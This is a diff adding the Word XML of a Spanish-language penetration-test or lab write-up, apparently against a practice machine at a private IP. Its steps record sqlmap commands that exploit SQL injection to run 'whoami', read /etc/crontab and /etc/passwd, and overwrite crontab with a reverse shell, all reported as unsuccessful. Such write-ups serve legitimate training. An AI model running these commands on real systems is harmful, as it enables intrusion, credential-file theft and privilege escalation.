+            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+            <wp:docPr id="730024513" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="730024513" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId28"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5404240" cy="2647460"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">2.- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Se intenta ejecutar comando directamente mediante sqlmap aprovechando la vulnerabilidad, con resultado negativo:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>$ sqlmap -u "http://10.0.2.21/admin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>edit.php?id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>=1" --os-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>whoami</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>" --cookie="PHPSESSID=q0vkbjoto6c95i2circtv7rac4"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ECF19DE" wp14:editId="72FE3302">
+            <wp:extent cx="5399665" cy="1325147"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
+            <wp:docPr id="1485351736" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1485351736" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId29"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5450914" cy="1337724"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3.- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a través del archivo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>crontab</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, el cual se usa para ejecutar archivos automáticamente en determinadas fechas, minutos, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">etc, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> previamente</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> descargado a través de sqlmap:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>sqlmap -u "http://10.0.2.21/admin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>edit.php?id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>=1" --file-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>read</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>="/etc/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>crontab</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>" --</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ookie="PHPSESSID=q0vkbjoto6c95i2circtv7rac4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>”, intent</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">o modificar </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dicho </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">archivo, incluyendo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>un</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> reverse Shell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">para intentar que se ejecute con privilegios de administrador </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>y subirlo mediante:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“sqlmap</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -u "http://10.0.2.21/admin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>edit.php?id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=1" </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">–file-write </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>="/home/kali</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/.local</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/share/sqlmap/output/10.0.2.21/files</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/_etc_crontab</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">" </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>–file-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>=”etc/crontab”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --cookie="PHPSESSID=q0vkbjoto6c95i2circtv7rac4"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Todo con </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>resultado</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> negativ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F8760D2" wp14:editId="1020E139">
+            <wp:extent cx="4768402" cy="3315312"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="308519386" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="308519386" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId30"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4801502" cy="3338325"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>4.-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> través del archivo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>passwd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> previamente descargado a través de sqlmap</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>“sqlmap -u "http://10.0.2.21/admin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>edit.php?id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>=1" --file-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>read</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>="/etc/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>passwd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>" -- cookie="PHPSESSID=q0vkbjoto6c95i2circtv7rac4”,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
